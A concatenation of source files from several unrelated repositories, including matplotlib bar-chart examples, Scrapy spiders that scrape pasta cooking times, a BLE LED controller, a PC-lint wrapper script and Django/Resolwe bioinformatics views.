import xarray as xr
import numpy as np
import matplotlib.pyplot as plt
#************************************************
def yyyymm_to_yyyyfrac(d, offset=0.5):
# todo: check the math on this.
out = []
for i in d.values:
tmp = str(int(i))
y = int(tmp[0:4])
m = int(tmp[-2:])
f = ((m+offset)-1)/12
out.append(y+f)
return np.array(out)
f = xr.open_dataset("/Users/brianpm/Downloads/SOI_Darwin.nc")
# note: I could not locate soi.nc as in NCL examples
date = f['date'] # YYYYMM
dsoid = f['DSOI']
dateF = yyyymm_to_yyyyfrac(date) # <- this is an NCL specialty; replicated above
dimDate = date.shape # number of dates
print(f"The shape of date is {date.shape}")
# the original was decadal, average
# usually you can use xarray to do this using time coords, but
# this dataset has just ints for time, so we can just reshape it adn average with np
yearly = np.mean(dsoid.values.reshape(dimDate[0]//12, 12), axis=1)
# convert integer YYYYMM to float
tmp = dateF.reshape(dimDate[0]//12, 12)
dateyearly = np.mean(tmp, axis=1)
print(dateyearly)
#
# create plot
#
# 1. try to do it like NCL,
# EXCEPT, have the bars originate from zero because that makes sense.
fig, ax = plt.subplots(figsize=(10,5))
ax.bar(dateyearly, yearly, color=None, edgecolor='black', fill=False)
fig.savefig("bar_1.png")
# 2. outline only
fig, ax = plt.subplots(figsize=(10,5))
ax.step(dateyearly, yearly, color='black')
fig.savefig("bar_2.png")
# Note: I don't know how to make the bars originate from some other value,
# like they do by default in NCL. Nor do I know of why you would ever want
# such behavior. You can set the bottom keyword argument, but that appears
# to adjust the whole data set.
# Instead, I show a very simple change to the orientation of the bars.
# 3. Change orientation
fig, ax = plt.subplots(figsize=(10,5))
ax.barh(dateyearly, yearly, color='red', edgecolor='black')
fig.savefig("bar_3.png")
# 4. Color based on value
fig, ax = plt.subplots(figsize=(10,5))
ax.barh(dateyearly[yearly < 0], yearly[yearly < 0], color='lightblue', edgecolor='')
ax.barh(dateyearly[yearly > 0], yearly[yearly > 0], color='pink', edgecolor='')
fig.savefig("bar_4.png")
# 5. change width of bars
fig, ax = plt.subplots(figsize=(10,5))
barwidth = 0.33
ax.barh(dateyearly[yearly < 0], yearly[yearly < 0], height=barwidth, color='lightblue', edgecolor='')
ax.barh(dateyearly[yearly > 0], yearly[yearly > 0], height=barwidth, color='pink', edgecolor='')
fig.savefig("bar_5.png")
# 6. Cycle through colors
fig, ax = plt.subplots(figsize=(10,5))
ax.bar(dateyearly, yearly, color=["yellow", "orange", "red"], edgecolor='black')
fig.savefig("bar_6.png")
# 7. Categorical data
x = [1,2,3,4,5,6,7,8]
y = [154900,56600,40000,30200,29700,24400,21700,13900]
labels = ["Lung","Colon/rectum","Breast","Prostate","Pancreas",
"Non-Hodgkin's\n Lymphoma","Leukemias","Ovary"]
barcolors = ["firebrick","red","orange","green",
"navy","blue","SkyBlue","SlateBlue"]
fig, ax = plt.subplots(constrained_layout=True)
ax.bar(x, y, color=barcolors)
ax.set_xticks(x)
ax.set_xticklabels(labels, rotation=45.)
ax.tick_params(axis='x', length=0)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
fig.suptitle("Estimated Cancer Deaths for 2002")
fig.savefig("bar_7.png")
# 8. Stacked bar chart
cities = ["a","b","c"]
ncities = len(cities)
d1 = np.array([1.0, 2.0, 3.0])
d2 = np.array([0.3, 0.5, 0.7])
d3 = np.array([0.5, 0.5, 0.5])
d4 = np.array([1.0, 1.0, 1.0])
fig, ax = plt.subplots(figsize=(3,9), constrained_layout=True)
b1 = ax.bar(np.arange(ncities), d1, label="Q1")
b2 = ax.bar(np.arange(ncities), d2, bottom=d1, label="Q2")
b3 = ax.bar(np.arange(ncities), d3, bottom=d1+d2, label="Q3")
b3 = ax.bar(np.arange(ncities), d4, bottom=d1+d2+d3, label="Q4")
ax.set_xticks(np.arange(ncities))
ax.set_xticklabels(cities)
fig.legend(loc='upper center')
fig.savefig("bar_8.png")
# Example 9
# Compare with http://www.ncl.ucar.edu/Applications/Images/bar_22_lg.png
# note: We do not try to set the bottom of bars to be below zero,
# as it makes no sense to do so.
times = np.array([3, 4, 5, 6]) # hours
time_strings = [f"{t:02d}:00" for t in times]
sflow = np.array([[0.0, 0.16, 0.20, 0.19],
[0.0, 0.15, 0.71, 0.61],
[0.0, 0.0, 0.25, 0.14],
[0.0, 0.0, 0.14, 0.19]])
ntime = len(times)
titles = [f"Station {i}" for i in range(1,ntime+1)]
clrs = ['navy', 'firebrick', 'goldenrod', 'green']
ntime = len(times)
time_strings = [f"{t:02d}:00" for t in times]
titles = [f"Station {i}" for i in range(1,ntime+1)]
fig, ax = plt.subplots(nrows=2, ncols=2, constrained_layout=True, sharex=True, sharey=True)
aa = ax.ravel()
[a.set_facecolor('lightgray') for a in aa]
[a.grid(b=True, which='both', axis='both', color='white', zorder=0) for a in aa]
for i in range(sflow.shape[0]):
aa[i].bar(times, sflow[i,:], edgecolor='black', color=clrs, zorder=50)
aa[-1].set_ylim([-.1, 1])
[aa[i].set_title(t) for i, t in enumerate(titles)]
aa[-1].set_xticks(times)
aa[-1].set_xticklabels(time_strings)
fig.text(-0.05, 0.5, 'STREAMFLOW', va='center', rotation='vertical')
fig.savefig("bar_9.png", bbox_inches='tight') # bbox_inches option to get ytitle in file
```
|
{
"source": "jenkin/course-ml-pieroit",
"score": 3
}
|
#### File: jenkin/course-ml-pieroit/esercizio_2.py
```python
import pandas as pd
from pandas.plotting import scatter_matrix
import matplotlib.pyplot as plt
from sklearn.datasets import load_breast_cancer
def main():
"""
Esercizio 2
"""
# carica dataset dataset
dataset = load_breast_cancer()
# converti a dataframe pandas e assegna nomi alle colonne
dataset_df = pd.DataFrame(dataset.data)
dataset_df.columns = dataset.feature_names
# stampa informazioni
print(dataset_df.head())
print(dataset_df.describe())
# grafici esplorativi
plt.rcParams['axes.labelsize'] = 4
plt.rcParams["axes.linewidth"] = 1.0
plt.rcParams["xtick.major.size"] = 0
plt.rcParams["ytick.major.size"] = 0
plt.rcParams["xtick.minor.size"] = 0
plt.rcParams["ytick.minor.size"] = 0
scatter_matrix(dataset_df[ dataset_df.columns ], figsize=(5, 5), s = 1)
plt.savefig('breast_cancer_dataset.png', dpi = 1200)
#plt.show()
main()
```
|
{
"source": "jenkin/pasta-timers-scrapers",
"score": 2
}
|
#### File: pasta-timers-scrapers/pasta/pipelines.py
```python
from scrapy.exceptions import DropItem
import re
class PastaPipeline(object):
pattern = re.compile(r" {2,}")
def process_item(self, item, spider):
if item.get("time"):
return {
key: self.pattern.sub(" ", item[key].strip()) if isinstance(item[key], str) else item[key]
for key in item.keys()
}
else:
raise DropItem("Missing time in %s" % item)
```
#### File: pasta/spiders/dececco.py
```python
import scrapy, json, re
class DeCeccoSpider(scrapy.Spider):
name = "<NAME>"
domain = "https://www.dececco.com"
allowed_domains = ["www.dececco.com","dececco.com"]
time_pattern = re.compile(r"\d+")
start_urls = [
"https://www.dececco.com/it_it/products/pasta-di-semola/",
"https://www.dececco.com/it_it/products/pasta-alluovo/",
"https://www.dececco.com/it_it/products/paste-speciali/",
"https://www.dececco.com/it_it/products/prodotti-integrali/",
"https://www.dececco.com/it_it/products/prodotti-bio/"
]
def parse(self, response):
for href in response.css(".products > li > a::attr(href)"):
yield response.follow(href, self.parse_product)
def parse_product(self, response):
yield {
"producer": self.name,
"line": "",
"name": response.css("scheda__hero__title::text").get(default=""),
"type": "",
"time": self.extract_time(response.css(".infolist::text").get(default="")),
"url": response.request.url,
"image": response.css(".scheda__hero__image > img::attr(src)").get(default="")
}
def extract_time(self, s):
try:
return int(self.time_pattern.search(s).group())
except:
return 0
```
#### File: pasta/spiders/garofalo.py
```python
import scrapy, json, re
class GarofaloSpider(scrapy.Spider):
name = "Garofalo"
domain = "https://www.pasta-garofalo.com"
allowed_domains = ["www.pasta-garofalo.com","pasta-garofalo.com"]
time_pattern = re.compile(r"\d+")
start_urls = [
"https://www.pasta-garofalo.com/it/prodotti/pasta-di-semola-di-grano-duro/",
"https://www.pasta-garofalo.com/it/prodotti/la-giostra-dei-bambini/",
"https://www.pasta-garofalo.com/it/prodotti/pasta-integrale-biologica/",
"https://www.pasta-garofalo.com/it/prodotti/pasta-senza-glutine/",
"https://www.pasta-garofalo.com/it/prodotti/pasta-legumi-e-cereali/",
"https://www.pasta-garofalo.com/it/prodotti/tanto-per-cambiare-latipica-cucina-italiana/",
"https://www.pasta-garofalo.com/it/prodotti/pasta-fresca-pasta-garofalo/",
"https://www.pasta-garofalo.com/it/prodotti/gnocchi/"
]
def parse(self, response):
for href in response.css(".product-preview-box .img-uri::attr(href)"):
yield response.follow(href, self.parse_product)
def parse_product(self, response):
yield {
"producer": self.name,
"line": response.css("#content > section > div:nth-child(1) > div.row.wow.fadeInUp > div > div > ul > li:nth-child(3) > p::text").get(default=""),
"name": response.css("#content > section > div:nth-child(1) > div.row.content-product > div:nth-child(1) > h1::text").get(default=""),
"type": response.css("#content > section > div:nth-child(1) > div.row.content-product > div:nth-child(1) > blockquote > a:nth-child(2)::text").get(default=""),
"time": self.extract_time(response.css("#content > section > div:nth-child(1) > div.row.wow.fadeInUp > div > div > ul > li:nth-child(1) > p::text").get(default="")),
"url": response.request.url,
"image": response.css("#content > section > div:nth-child(1) > div.row.content-product > div.col-sm-6.hidden-xs.wow.fadeInUp > img::attr(src)").get(default="")
}
def extract_time(self, s):
try:
return int(self.time_pattern.search(s).group())
except:
return 0
```
|
{
"source": "Jenkins183/ParallelProject",
"score": 4
}
|
#### File: Jenkins183/ParallelProject/insertionSort.py
```python
import time
import multiprocessing as mp
numProc = 4 # Starting number of Processes
# Serial Insertion Sort
# Slightly modified from: http://interactivepython.org/courselib/static/pythonds/SortSearch/TheInsertionSort.html
def serialInsertionSort(alist):
for index in range(1,len(alist)):
currentvalue = alist[index]
position = index
while position > 0 and alist[position - 1] > currentvalue:
alist[position] = alist[position - 1]
position = position - 1
alist[position] = currentvalue
return alist
def multiInsertionSort(conn, alist):
startTime = time.time()
alist = serialInsertionSort(alist)
endTime = time.time()
print("Insertion Sort Completed")
conn.send([alist, endTime - startTime])
conn.close()
def main():
startTime = time.time()
# Serial Calls
alist = [54, 26, 93, 17, 77, 31, 44, 55, 20, 100, -1, 8, 33, 33, 55, 0, 3, 90, 100000, 4444, -33]
print("Unsorted:", alist)
serialSortedList = serialInsertionSort(alist)
endTime = time.time()
totalTime = endTime - startTime
print("Serial Sorted:", serialSortedList)
print("Execution time: {} seconds".format(totalTime))
# Multiprocessing Calls
"""
processes = []
for i in range(numProc):
p = mp.Process(target = multiInsertionSort, args = [alist,])
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
#print("Multiprocessing Sorted:", multiSortedList)
"""
if __name__ == "__main__":
main()
```
|
{
"source": "jenkins-head/jenkins-head-controller",
"score": 2
}
|
#### File: src/ble/GattServerConnector.py
```python
import pygatt
import logging
class GattServerConnector(object):
__rgbMap = {
'SUCCESS': {
'red': bytearray('200', 'utf-8'),
'green': bytearray('200', 'utf-8'),
'blue': bytearray('200', 'utf-8')
},
'FAILURE': {
'red': bytearray('255', 'utf-8'),
'green': bytearray('0', 'utf-8'),
'blue': bytearray('0', 'utf-8')
},
}
__redUuid = '2e252e00-2f8b-4326-91de-26742dda4aa7'
__greenUuid = '6aeba5cd-4476-43b6-830b-021109ae6dea'
__blueUuid = '46f27bf3-5b1c-403e-bc20-90934a784e66'
__brightnessUuid = 'fc75589b-54ae-4b28-b54d-a35979f42b39'
def __init__(self, bleAddress: str):
self.__bluethoothAdapter = None
self.__bleAddress = bleAddress
def sendStatus(self, status: str):
rgbDict = self.__rgbMap[status]
if rgbDict:
self.__setRgbValues(rgbDict['red'], rgbDict['green'], rgbDict['blue'])
def __setRgbValues(self, red: str, green: str, blue: str):
try:
self.__handleBluetoothConnection()
self.__device.char_write(self.__redUuid, red)
self.__device.char_write(self.__greenUuid, green)
self.__device.char_write(self.__blueUuid, blue)
except Exception as exception:
logging.debug('Error on write: ' + str(exception))
def __handleBluetoothConnection(self):
if self.__bluethoothAdapter is None:
self.__bluethoothAdapter = pygatt.GATTToolBackend()
self.__bluethoothAdapter.start()
self.__device = self.__bluethoothAdapter.connect(self.__bleAddress)
def __del__(self):
self.__bluethoothAdapter.stop()
```
#### File: jenkins-head-controller/src/SignalHandler.py
```python
import signal
class SignalHandler:
__terminationRequested = False
def __init__(self):
signal.signal(signal.SIGINT, self.__handleSignal)
signal.signal(signal.SIGTERM, self.__handleSignal)
def __handleSignal(self, signum, frame):
self.__terminationRequested = True
def isTerminationRequested(self) -> bool:
return self.__terminationRequested
```
#### File: tests/SignalHandler/test_SignalHandler.py
```python
import mock
import pytest
from SignalHandler import SignalHandler
class TestSingalHandler(object):
@pytest.mark.parametrize('terminationRequested', [
True,
False
])
@mock.patch.object(SignalHandler, '_SignalHandler__terminationRequested', new_callable=mock.PropertyMock)
def test_singalHandlerGetter(self, mock_terminationRequested, terminationRequested):
mock_terminationRequested.return_value = terminationRequested
signalHandler = SignalHandler()
assert signalHandler.isTerminationRequested() == terminationRequested
@mock.patch('signal.signal')
def test_singalHandlerHandlerSignal(self, mock_signal):
signalHandler = SignalHandler()
assert mock_signal.call_count == 2
callArgumentList = mock_signal.mock_calls[0]
callbackMethod = callArgumentList.args[1]
callbackMethod(None, None)
assert signalHandler.isTerminationRequested() is True
```
|
{
"source": "jenkins-hypothesis/h",
"score": 2
}
|
#### File: h/services/__init__.py
```python
from __future__ import unicode_literals
def includeme(config):
config.register_service_factory(
".annotation_json_presentation.annotation_json_presentation_service_factory",
name="annotation_json_presentation",
)
config.register_service_factory(
".annotation_moderation.annotation_moderation_service_factory",
name="annotation_moderation",
)
config.register_service_factory(
".annotation_stats.annotation_stats_factory", name="annotation_stats"
)
config.register_service_factory(
".auth_ticket.auth_ticket_service_factory",
iface="pyramid_authsanity.interfaces.IAuthService",
)
config.register_service_factory(
".auth_token.auth_token_service_factory", name="auth_token"
)
config.register_service_factory(
".annotation_delete.annotation_delete_service_factory", name="annotation_delete"
)
config.register_service_factory(
".delete_group.delete_group_service_factory", name="delete_group"
)
config.register_service_factory(
".delete_user.delete_user_service_factory", name="delete_user"
)
config.register_service_factory(
".developer_token.developer_token_service_factory", name="developer_token"
)
config.register_service_factory(".feature.feature_service_factory", name="feature")
config.register_service_factory(".flag.flag_service_factory", name="flag")
config.register_service_factory(
".flag_count.flag_count_service_factory", name="flag_count"
)
config.register_service_factory(".group.groups_factory", name="group")
config.register_service_factory(
".group_create.group_create_factory", name="group_create"
)
config.register_service_factory(
".group_update.group_update_factory", name="group_update"
)
config.register_service_factory(
".group_links.group_links_factory", name="group_links"
)
config.register_service_factory(
".group_members.group_members_factory", name="group_members"
)
config.register_service_factory(
".groupfinder.groupfinder_service_factory", iface="h.interfaces.IGroupService"
)
config.register_service_factory(".links.links_factory", name="links")
config.register_service_factory(".group_list.group_list_factory", name="group_list")
config.register_service_factory(
".group_scope.group_scope_factory", name="group_scope"
)
config.register_service_factory(
".list_organizations.list_organizations_factory", name="list_organizations"
)
config.register_service_factory(".nipsa.nipsa_factory", name="nipsa")
config.register_service_factory(
".oauth_provider.oauth_provider_service_factory", name="oauth_provider"
)
config.register_service_factory(
".oauth_validator.oauth_validator_service_factory", name="oauth_validator"
)
config.register_service_factory(
".organization.organization_factory", name="organization"
)
config.register_service_factory(
".rename_user.rename_user_factory", name="rename_user"
)
config.register_service_factory(".settings.settings_factory", name="settings")
config.register_service_factory(".user.user_service_factory", name="user")
config.register_service_factory(
".user_unique.user_unique_factory", name="user_unique"
)
config.register_service_factory(
".user_password.user_password_service_factory", name="user_password"
)
config.register_service_factory(
".user_signup.user_signup_service_factory", name="user_signup"
)
config.register_service_factory(
".user_update.user_update_factory", name="user_update"
)
config.add_directive(
"add_annotation_link_generator", ".links.add_annotation_link_generator"
)
config.add_request_method(
".feature.FeatureRequestProperty", name="feature", reify=True
)
```
#### File: tests/functional/test_groups.py
```python
from __future__ import unicode_literals
import pytest
@pytest.mark.xfail # See https://github.com/hypothesis/product-backlog/issues/109
@pytest.mark.functional
def test_group_page_includes_referrer_tag(app, db_session, factories, user):
"""
The group read page should include a referrer tag.
When a logged-in user who is a member of the group visits the group's page,
the page should include a `<meta name="referrer" ...` tag that asks the
browser not to send the path part of the page's URL to third-party servers
in the Referer header when following links on the page.
This is because the group's URL is secret - if you have it you can join
the group.
"""
group = factories.Group(creator=user)
db_session.commit()
res = app.get("/groups/{pubid}/{slug}".format(pubid=group.pubid, slug=group.slug))
assert res.html.head.find("meta", attrs={"name": "referrer"}, content="origin")
@pytest.mark.functional
def test_submit_create_group_form_without_xhr_returns_full_html_page(app):
res = app.get("/groups/new")
group_form = res.forms["deform"]
group_form["name"] = "My New Group"
res = group_form.submit().follow()
assert res.text.startswith("<!DOCTYPE html>")
@pytest.mark.functional
def test_submit_create_group_form_with_xhr_returns_partial_html_snippet(app):
res = app.get("/groups/new")
group_form = res.forms["deform"]
group_form["name"] = "My New Group"
res = group_form.submit(xhr=True)
assert res.body.strip(b"\n").startswith(b"<form")
@pytest.mark.functional
def test_submit_create_group_form_with_xhr_returns_plain_text(app):
res = app.get("/groups/new")
group_form = res.forms["deform"]
group_form["name"] = "My New Group"
res = group_form.submit(xhr=True)
assert res.content_type == "text/plain"
@pytest.fixture
def user(db_session, factories):
# Password is '<PASSWORD>'
user = factories.User(
password="<PASSWORD>"
)
db_session.commit()
return user
@pytest.fixture
def app(app, user):
res = app.get("/login")
res.form["username"] = user.username
res.form["password"] = "<PASSWORD>"
res.form.submit()
return app
```
|
{
"source": "jenkinz/cmake-project-template",
"score": 3
}
|
#### File: cmake-project-template/cmake/lint.py
```python
import subprocess
import sys
FAIL_BUILD_ON_VIOLATION = False
def lint(argv):
"""
Invokes linting tool with given arguments and source file. This program
always writes the output to stdout. :param argv: pass all arguments to the
underlying PC-lint executable, and the source file to analyze :return: the
process exit code (-1 if a function violation is reported to stderr)
"""
# argv[1] - the lint executable name (must be in PATH or include the
# fully-qualified path)
lint_exe = argv[1]
# argv[2] - unit (single source module) or global (all modules with global
# wrap-up)
unit = (argv[2] == "--unit" or argv[2] == "-u")
# argv[3] - include path for lint option files
lint_inc = argv[3]
# argv[4] - compiler options file
co_gcc_lnt = argv[4]
# argv[5] - standards check rules options file
stds_lnt = argv[5]
# argv[6] - include directories separated by ';'
include_dirs = argv[6]
# argv[7] = compiler defines separated by ';'
defines = argv[7]
# argv[8] - the source file(s)
sources = argv[8]
# argv[9] - output file
output_file = argv[9]
if unit:
unit_opt = "-u"
else:
unit_opt = ""
includes = include_dirs.split(';')
lint_includes = []
for inc in includes:
if len(inc) > 0:
lint_includes.append("-i" + inc) # prepend "-i" to each include dir (required for lint command)
defs = defines.split(';')
lint_defines = []
for define in defs:
if len(define) > 0:
if "=" in define:
sep = define.split("=")
define = sep[0] + "=" + '"' + sep[1] + '"' # surround rvalue with quotes
lint_defines.append("-d" + define) # prepend "-d" to each define (required for lint command)
sources = sources.split(';')
lint_sources = []
for src in sources:
if len(src) > 0 and not src.endswith((".S", ".s", ".asm")): # exclude assembly source files (C/C++ only)
lint_sources.append(src)
# note: '-frz' option is specified below to return nonzero exit status on
# one or more PC-lint violation(s)
cmd = f'{lint_exe} {lint_inc} {co_gcc_lnt} {stds_lnt} options.lnt {" ".join(lint_includes)} {" ".join(lint_defines)} -frz {unit_opt} {" ".join(lint_sources)}'
completed_process = subprocess.run(args=cmd, capture_output=True, shell=True, text=True)
if completed_process.returncode > 0: # return code is violation count
# sys.stderr.write(completed_process.stderr) # hide banner output
sys.stdout.write(completed_process.stdout)
# log to output file
f = open(output_file, "w")
f.write(completed_process.stderr)
f.seek(len(completed_process.stderr))
f.write(completed_process.stdout)
f.close()
if FAIL_BUILD_ON_VIOLATION:
return completed_process.returncode
else:
return 0
if __name__ == "__main__":
sys.exit(lint(sys.argv))
```
|
{
"source": "JenkoB/resolwe-bio",
"score": 2
}
|
#### File: resolwe-bio/resolwe_bio/apps.py
```python
from django.apps import AppConfig
class BaseConfig(AppConfig):
"""App configuration."""
name = 'resolwe_bio'
verbose_name = 'Resolwe Bioinformatics'
def ready(self):
"""Perform application initialization."""
# Register signals handlers
from . import signals # pylint: disable=unused-variable
```
#### File: resolwe_bio/kb/search_indexes.py
```python
from haystack import indexes
from .models import Feature, Mapping
class FeatureIndex(indexes.SearchIndex, indexes.Indexable):
"""Feature search index definition."""
# This is a workaround for the Haystack limitation that all document=True fields
# on all indices in the whole application must be of the same type. Therefore, we
# use a CharField and have a separate MultiValueField.
text = indexes.CharField(document=True)
genes = indexes.MultiValueField()
source = indexes.CharField(model_attr='source')
name_auto = indexes.EdgeNgramField(boost=10.0)
aliases_auto = indexes.EdgeNgramField()
def get_model(self):
"""Model to index."""
return Feature
def prepare_text(self, obj):
"""Prepare the value for the 'text' field during indexing."""
return '\n'.join(self.prepare_genes(obj))
def prepare_genes(self, obj):
"""Prepare the value for the 'genes' field during indexing."""
return [obj.name, obj.feature_id] + obj.aliases
def prepare_name_auto(self, obj):
"""Prepare the value for the 'name_auto' field during indexing."""
return ' '.join([obj.name, obj.feature_id])
def prepare_aliases_auto(self, obj):
"""Prepare the value for the 'aliases_auto' field during indexing."""
return ' '.join(obj.aliases)
class MappingIndex(indexes.SearchIndex, indexes.Indexable):
"""Mapping search index definition."""
text = indexes.CharField(document=True)
# TODO: All these fields should not use the 'snowball' analyzer (Haystack limitation!).
relation_type = indexes.CharField(model_attr='relation_type')
source_db = indexes.CharField(model_attr='source_db')
source_id = indexes.CharField(model_attr='source_id')
target_db = indexes.CharField(model_attr='target_db')
target_id = indexes.CharField(model_attr='target_id')
def get_model(self):
"""Model to index."""
return Mapping
def prepare_text(self, obj):
"""Prepare the value for the 'text' field during indexing."""
return '\n'.join([obj.source_db, obj.source_id, obj.target_db, obj.target_id])
```
#### File: resolwe_bio/kb/views.py
```python
from django.utils.decorators import classonlymethod
from rest_framework import viewsets, mixins, permissions, filters
from haystack.query import SQ
from drf_haystack.viewsets import HaystackViewSet
from .models import Feature, Mapping
from .serializers import (FeatureSerializer, FeatureSearchSerializer, FeatureAutocompleteSerializer,
MappingSerializer, MappingSearchSerializer)
from .filters import MappingFilter
class FeatureSearchViewSet(HaystackViewSet):
"""
Endpoint used for feature search.
Request:
- query
- source
Response:
- a list of matching features
"""
index_models = [Feature]
serializer_class = FeatureSearchSerializer
@classonlymethod
def as_view(cls, actions=None, **initkwargs):
"""Support POST for searching against a list of genes."""
if actions.get('get', None) == 'list':
actions['post'] = 'list_with_post'
return super(cls, FeatureSearchViewSet).as_view(actions, **initkwargs)
def filter_queryset(self, queryset):
"""Support filtering by a list of genes."""
queryset = super(FeatureSearchViewSet, self).filter_queryset(queryset)
if 'query' in self.request.data:
queryset = queryset.filter(genes__in=self.request.data['query'])
if 'source' in self.request.data:
queryset = queryset.filter(source=self.request.data['source'])
return queryset
def list_with_post(self, request):
"""Support search via a POST request in addition to GET."""
return self.list(request)
class FeatureAutocompleteViewSet(HaystackViewSet):
"""Endpoint used for feature autocompletion."""
index_models = [Feature]
serializer_class = FeatureAutocompleteSerializer
def filter_queryset(self, queryset):
"""Construct a correct filter query."""
query = self.request.query_params.get('query', None)
if not query:
return queryset.none()
queryset = queryset.filter(SQ(name_auto=query) | SQ(aliases_auto=query))
source = self.request.query_params.get('source', None)
if source:
queryset = queryset.filter(source=source)
return queryset
class FeatureViewSet(mixins.ListModelMixin,
mixins.RetrieveModelMixin,
mixins.CreateModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
viewsets.GenericViewSet):
"""API view for :class:`Feature` objects."""
serializer_class = FeatureSerializer
permission_classes = [permissions.IsAdminUser]
filter_backends = [filters.DjangoFilterBackend]
queryset = Feature.objects.all()
def create(self, request):
"""A custom create, which updates existing features instead of failing."""
try:
feature = Feature.objects.get(
source=request.data['source'],
feature_id=request.data['feature_id']
)
self.kwargs[self.lookup_field] = feature.pk
return super(FeatureViewSet, self).update(request) # pylint: disable=no-member
except (Feature.DoesNotExist, KeyError): # pylint: disable=no-member
return super(FeatureViewSet, self).create(request) # pylint: disable=no-member
class MappingSearchViewSet(HaystackViewSet):
"""
Endpoint used for mapping search.
Request:
- source_id
- source_db
- target_id
- target_db
- relation_type
Response:
- a list of matching mappings
"""
index_models = [Mapping]
serializer_class = MappingSearchSerializer
@classonlymethod
def as_view(cls, actions=None, **initkwargs):
"""Support POST for searching against a list of genes."""
if actions.get('get', None) == 'list':
actions['post'] = 'list_with_post'
return super(cls, MappingSearchViewSet).as_view(actions, **initkwargs)
def filter_queryset(self, queryset):
"""Support filtering by a list of genes."""
queryset = super(MappingSearchViewSet, self).filter_queryset(queryset)
if 'source_id' in self.request.data:
queryset = queryset.filter(source_id__in=self.request.data['source_id'])
if 'source_db' in self.request.data:
queryset = queryset.filter(source_db=self.request.data['source_db'])
if 'target_id' in self.request.data:
queryset = queryset.filter(target_id__in=self.request.data['target_id'])
if 'target_db' in self.request.data:
queryset = queryset.filter(target_db=self.request.data['target_db'])
if 'relation_type' in self.request.data:
queryset = queryset.filter(relation_type=self.request.data['relation_type'])
return queryset
def list_with_post(self, request):
"""Support search via a POST request in addition to GET."""
return self.list(request)
class MappingViewSet(mixins.ListModelMixin,
mixins.RetrieveModelMixin,
mixins.CreateModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
viewsets.GenericViewSet):
"""API view for :class:`Mapping` objects."""
serializer_class = MappingSerializer
permission_classes = [permissions.IsAdminUser]
filter_backends = [filters.DjangoFilterBackend]
filter_class = MappingFilter
queryset = Mapping.objects.all()
def create(self, request):
"""A custom create, which updates existing mappings instead of failing."""
try:
mapping = Mapping.objects.get(
source_db=request.data['source_db'],
source_id=request.data['source_id'],
target_db=request.data['target_db'],
target_id=request.data['target_id']
)
self.kwargs[self.lookup_field] = mapping.pk
return super(MappingViewSet, self).update(request) # pylint: disable=no-member
except (Mapping.DoesNotExist, KeyError): # pylint: disable=no-member
return super(MappingViewSet, self).create(request) # pylint: disable=no-member
```
#### File: management/commands/generate_geneset.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import csv
import gzip
import json
import logging
import os
import random
import string
import datetime
from django.core.management.base import BaseCommand
from django.conf import settings
from django.utils import timezone
from resolwe.flow.models import Data, Storage
from resolwe.utils import BraceMessage as __
from .utils import get_descriptorschema, get_process, get_superuser
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class Command(BaseCommand):
"""Generate gene set data."""
help = "Generate test gene sets."
def __init__(self, *args, **kwargs):
"""Set command defaults."""
super(Command, self).__init__(*args, **kwargs)
self.data_dir = settings.FLOW_EXECUTOR['DATA_DIR']
self.test_files_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', 'tests', 'files'))
def add_arguments(self, parser):
"""Define command arguments."""
parser.add_argument('-n', '--n-geneset', type=int, default=5,
help="Number of gene sets to generate (default: %(default)s)")
parser.add_argument('--rseed', action='store_true', help="Use fixed random seed")
@staticmethod
def get_random_word(length):
"""Generate a random word."""
return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))
@staticmethod
def generate_geneset_file(gene_ids, num, path):
"""Generate gene set file."""
with gzip.open(os.path.join(path, 'geneset.tab.gz'), 'wt') as f:
csvwriter = csv.writer(f, delimiter=str('\t'), lineterminator='\n')
with gzip.open(gene_ids, mode='rt') as gene_ids:
all_genes = [line.strip() for line in gene_ids]
geneset = sorted(set([random.choice(all_genes) for _ in range(num)]))
for gene in geneset:
csvwriter.writerow([gene])
json_dump = json.dumps({'genes': geneset}, indent=4, sort_keys=True)
with open(os.path.join(path, 'geneset.json'), 'w') as json_file:
json_file.write(json_dump)
def create_geneset(self):
"""Create gene set object."""
started = timezone.now()
geneset = Data.objects.create(
name='GeneSet_{}_{}'.format(random.choice(['Hs', 'Mm']), self.get_random_word(3)),
process=get_process('upload-geneset'),
contributor=get_superuser(),
started=started,
finished=started + datetime.timedelta(seconds=5),
descriptor_schema=get_descriptorschema('geneset'),
descriptor={'description': 'Gene set description.'},
status=Data.STATUS_PROCESSING,
input={'src': {'file': 'geneset.tab.gz'}, 'source': 'UCSC'})
mouse_genes = os.path.join(self.test_files_path, 'mouse_genes.tab.gz')
os.mkdir(os.path.join(self.data_dir, str(geneset.id)))
self.generate_geneset_file(mouse_genes,
random.randint(15, 150),
os.path.join(self.data_dir, str(geneset.id)))
json_object = Storage.objects.create(
json=json.load(open(os.path.join(self.data_dir, str(geneset.id), 'geneset.json'))),
contributor=get_superuser(),
name='{}_storage'.format(geneset.name),
data=geneset)
os.remove(os.path.join(self.data_dir, str(geneset.id), 'geneset.json'))
geneset.output = {
'geneset': {'file': 'geneset.tab.gz'},
'geneset_json': json_object.id,
'source': 'UCSC'
}
geneset.status = Data.STATUS_DONE
geneset.save()
with open(os.path.join(self.data_dir, str(geneset.id), 'stdout.txt'), 'w') as stdout:
stdout.write('Generate gene set. Gene set was created '
'with the generate_geneset django-admin command.')
logger.info(__('Created Gene set object: (id={})', geneset.id))
def handle(self, *args, **options):
"""Command handle."""
if options['rseed']:
random.seed(42)
for _ in range(options['n_geneset']):
self.create_geneset()
```
#### File: resolwe-bio/resolwe_bio/serializers.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
from rest_framework import serializers
from resolwe.flow.serializers import CollectionSerializer
from .models import Sample
class SampleSerializer(CollectionSerializer):
"""Serializer for sample."""
collections = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
def create(self, validated_data):
"""Create ``Sample``and set ``presample``to ``False``."""
validated_data['presample'] = False
return super(SampleSerializer, self).create(validated_data)
class Meta(CollectionSerializer.Meta):
"""Serializer configuration."""
model = Sample
fields = CollectionSerializer.Meta.fields + ('collections',)
read_only_fields = CollectionSerializer.Meta.read_only_fields + ('presample',)
